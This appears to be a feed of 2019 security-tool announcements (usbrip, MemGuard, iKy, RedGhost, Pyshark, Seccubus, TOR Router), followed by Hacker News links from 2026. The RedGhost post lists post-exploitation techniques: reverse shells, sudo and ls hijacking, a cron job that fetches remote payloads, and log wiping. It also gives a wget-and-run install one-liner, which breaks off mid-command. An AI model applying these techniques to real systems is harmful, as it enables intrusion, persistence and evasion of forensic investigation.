usbrip is available for download and installation at PyPI:

$ pip3 install usbrip



Git Clone

For simplicity, lets agree that all the commands where ~/usbrip$ prefix is appeared are executed in the ~/usbrip directory which is created as a result of git clone:

~$ git clone https://github.com/snovvcrash/usbrip.git usbrip && cd usbrip
~/usbrip$

Dependencies

usbrip works with non-modified structure of system log files only, so, unfortunately, it won't be able to parse USB history if you change the format of syslogs (with syslog-ng or rsyslog, for example). That's why the timestamps of "Connected" and "Disconnected" fields don't have the year, by the way. Keep that in mind.

DEB Packages

  • python3.6 (or newer) interpreter
  • python3-venv
  • p7zip-full (used by storages module)
  • ~$ sudo apt install -y python3-venv p7zip-full

PIP Packages

usbrip makes use of the following external modules:
  • terminaltables
  • termcolor

To resolve Python dependencies manually (it's not necessary actually because pip or setup.py can automate the process, see Installation) create a virtual environment (optional) and run pip from within:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install -r requirements.txt

Or let the pipenv one-liner do all the dirty work for you:

~/usbrip$ pipenv install && pipenv shell

After that you can run usbrip portably:

(venv) ~/usbrip$ python -m usbrip -h
Or
(venv) ~/usbrip$ python __main__.py -h

Installation

There are two ways to install usbrip into the system: pip or setup.py.

pip or setup.py

First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install .

(venv) ~/usbrip$ usbrip -h

Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ python setup.py install

(venv) ~/usbrip$ usbrip -h

alien Note: you'd likely want to run the installation process while the Python virtual environment is active (like it is shown above).

install.sh

Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.

When using the ./installers/install.sh some extra features become available:
  • the virtual environment is created automatically;
  • the storage module becomes available: you can set a crontab job to backup USB events on a schedule (the example of crontab jobs can be found in usbrip/cron/usbrip.cron).

Warning: if you are using the crontab scheduling, you want to configure the cron job with sudo crontab -e in order to force the storage update submodule run as root as well as protect the passwords of the USB event storages. The storage passwords are kept in /var/opt/usbrip/usbrip.ini.

The ./installers/uninstall.sh script removes all the installation artifacts from your system.

To install usbrip use:

~/usbrip$ chmod +x ./installers/install.sh
~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]
~/usbrip$ cd

~$ usbrip -h

  • When -l switch is enabled, Python dependencies are resolved from local .tar packages (./3rdPartyTools/) instead of PyPI.
  • When -s switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.

Note: when using -s option during installation, make sure that system logs do contain at least one external USB device entry. It is a necessary condition for usbrip to successfully create the list of trusted devices (and as a result, successfully create the violations storage).

After the installation completes, feel free to remove the usbrip folder.

Paths

When installed, the usbrip uses the following paths:
  • /opt/usbrip/ — project's main directory;
  • /var/opt/usbrip/usbrip.ini — usbrip configuration file: keeps passwords for 7zip storages;
  • /var/opt/usbrip/storage/ — USB event storages: history.7z and violations.7z (created during the installation process);
  • /var/opt/usbrip/log/ — usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);
  • /var/opt/usbrip/trusted/ — list of trusted USB devices (created during the installation process);
  • /usr/local/bin/usbrip — symlink to the /opt/usbrip/venv/bin/usbrip script.

cron

Cron jobs can be set as follows:

~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron
~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron
~/usbrip$ sudo crontab tmpcron
~/usbrip$ rm tmpcron

uninstall.sh

To uninstall usbrip use:

~/usbrip$ chmod +x ./installers/uninstall.sh
~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]

When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.

And don't forget to remove the cron job.

Usage

Synopsis

# ---------- BANNER ----------

$ usbrip banner
Get usbrip banner.

# ---------- EVENTS ----------

$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB event history.

$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Open USB event dump.

$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Generate a list of trusted (authorized) USB devices.

$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB violation events based on the list of trusted devices.

# ---------- STORAGE ----------

$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]
List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".

$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]
Open selected storage (7zip archive). Behaves similary to the EVENTS OPEN submodule.

$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].

$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Create storage — create 7zip archive and add USB events to it according to the selected options.

$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Change password of the existing storage.

# ---------- IDs ----------

$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]
Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.

$ usbrip ids download [-q] [--debug]
Update (download) the USB ID database.

Help

To get a list of module names use:

$ usbrip -h

To get a list of submodule names for a specific module use:

$ usbrip <module> -h

To get a list of all switches for a specific submodule use:

$ usbrip <module> <submodule> -h


Examples

Show the event history of all USB devices, supressing banner output, info messages and user interaction (-q, --quiet), represented as a list (-l, --list) with latest 100 entries (-n NUMBER, --number NUMBER):

$ usbrip events history -ql -n 100

Show the event history of the external USB devices (-e, --external, which were actually disconnected) represented as a table (-t, --table) containing "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (-c COLUMN [COLUMN], --column COLUMN [COLUMN]) filtered by date (-d DATE [DATE ...], --date DATE [DATE ...]) with logs taken from the outer files (-f FILE [FILE ...], --file FILE [FILE ...]):

$ usbrip events history -et -c conn vid pid disconn serial -d "Dec  9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz

Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is NOT terminal stdout (| or > for example) there would be no ANSI escape characters (color) in the output so feel free to use it that way. Also notice that usbrip uses some UNICODE symbols so it would be nice to convert the resulting file to UTF-8 encoding (with encov for example) as well as change newline characters to Windows style for portability (with awk for example):

usbrip history events -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out

Remark: you can always get rid of the escape characters by yourself even if you have already got the output to stdout. To do that just copy the output data to usbrip.out and add one more awk instruction:

awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out && enconv -x UTF8 usbrip.out

Generate a list of trusted USB devices as a JSON-file (trusted/auth.json) with "VID" and "PID" attributes containing the first three devices connected on September 26:

$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"

Search the event history of the external USB devices for violations based on the list of trusted USB devices (trusted/auth.json) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:

$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid

Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):

$ usbrip ids search --vid 0781 --pid 5580

Download the latest version of usb_ids/usb.ids database (the source is here):

$ usbrip ids download

Download USBrip

Article link

Date of publish: Mon, 29 Jul 2019 07:18:00 +0000

MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory



MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory


This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.

Features


  • Sensitive data is encrypted and authenticated in memory using xSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.
  • Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.
  • Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.
  • Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.
  • Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.
  • Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.
  • Side-channel attacks are mitigated against by making sure that the copying and comparison of data is done in constant-time.
  • Accidental memory leaks are mitigated against by harnessing the garbage-collector to automatically destroy containers that have become unreachable.

Some features were inspired by libsodium, so credits to them.

Full documentation and a complete overview of the API can be found here. Interesting and useful code samples can be found within the examples subpackage.

Installation

$ go get github.com/awnumar/memguard

We strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.

Contributing


  • Using the package and identifying points of friction.
  • Reading the source code and looking for improvements.
  • Adding interesting and useful program samples to ./examples.
  • Developing Proof-of-Concept attacks and mitigations.
  • Improving compatibility with more kernels and architectures.
  • Implementing kernel-specific and cpu-specific protections.
  • Writing useful security and crypto libraries that utilise memguard.
  • Submitting performance improvements or benchmarking code.

Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.

Future goals


  • Ability to stream data to and from encrypted enclave objects.
  • Catch segmentation faults to wipe memory before crashing.
  • Evaluate and improve the strategies in place, particularly for Coffer objects.
  • Formalise a threat model and evaluate our performance in regards to it.
  • Use lessons learned to apply patches upstream to the Go language and runtime.

Article link

Date of publish: Sun, 28 Jul 2019 13:14:00 +0000

iKy OSINT Project - To Collect Information From E-Mail With GUI


iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.


Project iKy is to collects information from an email and shows results in a nice visual interface.

Installation


Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

And turn on the server in a terminal

redis-server

Python stuff and Celery

You must install the libraries inside requirements.txt
pip install -r requirements.txt

And turn on Celery in another terminal, within the directory backend
./celery.sh

Finally, again, in another terminal turn on backend app from directory backend

python app.py

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the directory frontend install the dependencies

npm install

Turn on Frontend Server

Finally, to run frontend server, execute:

npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded

Video Demo

Article link

Date of publish: Mon, 22 Jul 2019 08:22:00 +0000

RedGhost - Linux Post Exploitation Framework

RedGhost -  Linux Post Exploitation Framework

RedGhost- Linux post exploitation framework 


It has designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace. 


  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

  • SudoInject
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion

  • lsInject
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence

  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence

  • GetRoot
Function to try various methods to escalate privileges

  • Clearlogs
Function to clear logs and make investigation with forensics difficult

  • MassInfoGrab
Function to grab mass reconaissance/information on system

  • CheckVM
Function to check if the system is a virtual machine

  • MemoryExec
Function to execute remote bash script in memory

  • BanIp
Function to BanIp using iptables

Installation

Install RedGhost in one line code:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

One line code to Install prerequisites and RedGhost :

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g

Download Redghost

Article link

Date of publish: Fri, 19 Jul 2019 08:30:00 +0000

Pyshark- To Allowing Python Packet Parsing Using Wireshark Dissectors


Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.


Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of those files read from their respective source and then can be used as an iterator to get their packets. Each capture object can also receive various filters so that only some of the incoming packets will be saved.

Installation

All Platforms

Simply run the following to install the latest from pypi

pip install pyshark

Or install from the git repository:

git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X

You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:

xcode-select --install
pip install libxml

You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:

>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print cap[0]
Packet (Length: 698)
Layer ETH:
        Destination: BLANKED
        Source: BLANKED
        Type: IP (0x0800)
Layer IP:
        Version: 4
        Header Length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
        Total Length: 684
        Identification: 0x254f (9551)
        Flags: 0x00
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (17)
        Header checksum: 0xe148 [correct]
        Source: BLANKED
        Destination: BLANKED
  ...

Other options

  • param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
  • param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
  • param display_filter: A display (wireshark) filter to apply on the cap before reading it.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK.
  • param tshark_path: Path of the tshark binary.

Reading from a live interface:

>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live interface using a ring buffer

>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param ring_file_size: Size of the ring file in kB, default is 1024
  • param num_ring_files: Number of ring files to keep, default is 1
  • param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live remote interface:

>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
>>> capture.sniff(timeout=50)
>>> capture

Other options
  • param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
  • param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
  • param remote_port: The remote port the rpcapd service is listening on
  • param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary

Accessing packet data:

Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.

All of the following work:

>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100

To test whether a layer is in a packet, you can use its name:

>>> 'IP' in packet
True

To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names) or the autocomplete function on your interpreter.

You can also get the original binary data of a field, or a pretty description of it:

>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'

Decrypting packet captures

Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).

>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')

A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.

>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')

Python2 deprecation - 

This package no longer supports Python2. If you wish to still use it in Python2, you can:

Use version 0.3.8

  • Install pyshark-legacy via pypi
  • Clone the pyshark-legacy [repo (https://github.com/KimiNewt/pyshark-legacy)], where bugfixes will be applied.


Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.

There are quite a few python packet parsing modules, this one is different because it doesn't actually parse any packets, it simply uses tshark's (wireshark command-line utility) ability to export XMLs to use its parsing.

This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.

Download Pyshark

Article link

Date of publish: Tue, 16 Jul 2019 14:19:00 +0000

Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time - eBook


"Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time"


Learn how to hack systems like black hat hackers and secure them like security experts.

This eBook will help you:

  • Understand ethical hacking and the different fields and types of hackers
  • Set up a penetration testing lab to practice safe and legal hacking
  • Explore Linux basics, commands, and how to interact with the terminal
  • Access password-protected networks and spy on connected clients
  • Use server and client-side attacks to hack and control remote computers
  • Control a hacked system remotely and use it to hack other systems
  • Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections
  • Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!

Free offer expires 07/23/19.

Offered Free by: Packt

 DOWNLOAD NOW!
DOWNLOAD NOW

Article link

Date of publish: Wed, 10 Jul 2019 19:28:00 +0000

Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.

Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.

On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.

Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Medusa
  • Qualys SSL labs
  • testssl.sh (local and remote)

Docker

Available images.

         Image name                                   Purpose                         
  • seccubus                     Run a full Seccubus stack in a single container
  • seccubus-front            Serving just the front end HTML, javascript and css
  • seccubus-web             Serving front and code and API simultaniously
  • seccubus-api               Serving just the API.
  • seccubus-perl              Running command line scripts, e.g. to scan
  • seccubus-cron             Running cron deamon to execute scans


Information about the docker containers is here

Default password, changing it.

After installation the default username and password for seccubus is:

admin / GiveMeVulns!

It is highly recommended you change this after installation.

/bin/seccubus_passwd -u admin

Download Seccubus

Article link

Date of publish: Fri, 21 Jun 2019 14:05:00 +0000

TOR Router- To Use As Transparent Proxy And Send Traffic Under TOR


TOR Router- A tool that allow you to make TOR your default gateway and send all internet connections under TOR (as transparent proxy) for increase privacy/anonymity without extra unnecessary code.

Tor Router allow you to use TOR as a transparent proxy and send all your traffic under TOR INCLUDING DNS REQUESTS, the only that you need is: a system using systemd (if you want to use the service) and tor.

TOR router doesn't touch system files as the rest of tools for routing your taffic does and the reason is: there isn't needed to move files for routing traffic, also moving files is a bad idea since that a fail in the script/tool can break your system connection without you knowing what has happened.

Script to install on distros using SystemD only

If you are using BlackArch Linux (https://blackarch.org) you can install the script from the repos using the following command:

# pacman -S tor-router

To install from source:

Note that you need BASH, not sh

~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh

Usage

In distros using systemd, you should consideer using the install.sh script, anyways the process to install/configure tor-router is described here.

It script require root privileges

1. Open a terminal and clone the script using the following command:
~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd tor-router/files

2. Put the following lines at the end of /etc/tor/torrc
# Seting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

3. Restart the tor service
4. Execute the tor-router script as root
# sudo ./tor-router

5. Now all your traffic is under TOR, you can check that in the following pages: https://check.torproject.org and for DNS tests: https://dnsleaktest.com

6. In order to automate the process of the script, you should add it to the SYSTEM autostart scripts according that the init that you are using, for systemd we have a .service file in the files folder.

Uninstalling/Stoping

Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.

Proof of concept

After of run the script, follow the next steps to ensure that all is working as expected:

IP hidden and TOR network configured: 
Visit https://check.torproject.org, you should see a message like it:


Checking DNS Leaks: 

Visit https://dnsleaktest.com and make a extended test to see what are your DNS. You shloud get some like it:


Distros using the script

BlackArch Linux: https://github.com/BlackArch/blackarch/blob/master/packages/tor-router

Download TOR Router

Article link

Date of publish: Wed, 12 Jun 2019 11:00:00 +0000

Hacker News: Front Page

Yann LeCun's AI startup raises $1B in Europe's largest ever seed round

Article URL: https://www.ft.com/content/e5245ec3-1a58-4eff-ab58-480b6259aaf1

Comments URL: https://news.ycombinator.com/item?id=47321533

Points: 14

# Comments: 4

Article link

Date of publish: Tue, 10 Mar 2026 10:50:30 +0000

OpenClaw Did Not Just Go Viral in China, It Solved a Structural Problem

Article URL: https://hellochinatech.com/p/openclaw-china-ai-stack

Comments URL: https://news.ycombinator.com/item?id=47321494

Points: 7

# Comments: 2

Article link

Date of publish: Tue, 10 Mar 2026 10:44:40 +0000

I'd had several careers but no degree – then I became a palaeontologist at 62

Article URL: https://www.theguardian.com/lifeandstyle/2026/mar/09/a-new-start-after-60-career-palaeontologist

Comments URL: https://news.ycombinator.com/item?id=47321445

Points: 4

# Comments: 0

Article link

Date of publish: Tue, 10 Mar 2026 10:38:39 +0000

I put my whole life into a single database

Article URL: https://howisfelix.today/

Comments URL: https://news.ycombinator.com/item?id=47321233

Points: 6

# Comments: 0

Article link

Date of publish: Tue, 10 Mar 2026 10:07:48 +0000

Redox OS has adopted a Certificate of Origin policy and a strict no-LLM policy

Article URL: https://gitlab.redox-os.org/redox-os/redox/-/blob/master/CONTRIBUTING.md

Comments URL: https://news.ycombinator.com/item?id=47320661

Points: 135

# Comments: 119

Article link

Date of publish: Tue, 10 Mar 2026 08:54:53 +0000

LoGeR – 3D reconstruction from extremely long videos (DeepMind, UC Berkeley)

Article URL: https://loger-project.github.io

Comments URL: https://news.ycombinator.com/item?id=47319620

Points: 52

# Comments: 18

Article link

Date of publish: Tue, 10 Mar 2026 06:16:06 +0000

Show HN: I Was Here – Draw on street view, others can find your drawings

Hey HN, I made a site where you can draw on street-level panoramas. Your drawings persist and other people can see them in real time.

Strokes get projected onto the 3D panorama so they wrap around buildings and follow the geometry, not just a flat overlay. Uses WebGL2 for rendering, Mapillary for the street imagery.

The idea is for it to become a global canvas, anyone can leave a mark anywhere and others stumble onto it.


Comments URL: https://news.ycombinator.com/item?id=47319255

Points: 32

# Comments: 22

Article link

Date of publish: Tue, 10 Mar 2026 05:04:23 +0000

Learnings from paying artists royalties for AI-generated art

Article URL: https://www.kapwing.com/blog/learnings-from-paying-artists-royalties-for-ai-generated-art/

Comments URL: https://news.ycombinator.com/item?id=47318421

Points: 136

# Comments: 112

Article link

Date of publish: Tue, 10 Mar 2026 02:24:52 +0000

The “JVG algorithm” only wins on tiny numbers

Article URL: https://scottaaronson.blog/?p=9615

Comments URL: https://news.ycombinator.com/item?id=47317739

Points: 70

# Comments: 38

Article link

Date of publish: Tue, 10 Mar 2026 00:35:19 +0000

Two Years of Emacs Solo

Article URL: https://www.rahuljuliato.com/posts/emacs-solo-two-years

Comments URL: https://news.ycombinator.com/item?id=47317616

Points: 269

# Comments: 79

Article link

Date of publish: Tue, 10 Mar 2026 00:16:44 +0000

Getting Started in Common Lisp

Article URL: https://lisp-stat.dev/blog/2026/03/09/getting-started/

Comments URL: https://news.ycombinator.com/item?id=47317348

Points: 50

# Comments: 9

Article link

Date of publish: Mon, 09 Mar 2026 23:43:29 +0000

No, it doesn't cost Anthropic $5k per Claude Code user

Article URL: https://martinalderson.com/posts/no-it-doesnt-cost-anthropic-5k-per-claude-code-user/

Comments URL: https://news.ycombinator.com/item?id=47317132

Points: 236

# Comments: 171

Article link

Date of publish: Mon, 09 Mar 2026 23:22:06 +0000

Notes on Baking at the South Pole

Article URL: https://www.newyorker.com/culture/the-weekend-essay/the-most-beautiful-freezer-in-the-world

Comments URL: https://news.ycombinator.com/item?id=47313934

Points: 64

# Comments: 23

Article link

Date of publish: Mon, 09 Mar 2026 19:12:14 +0000

Florida judge rules red light camera tickets are unconstitutional

Article URL: https://cbs12.com/news/local/florida-news-judge-rules-red-light-camera-tickets-unconstitutional

Comments URL: https://news.ycombinator.com/item?id=47312090

Points: 432

# Comments: 553

Article link

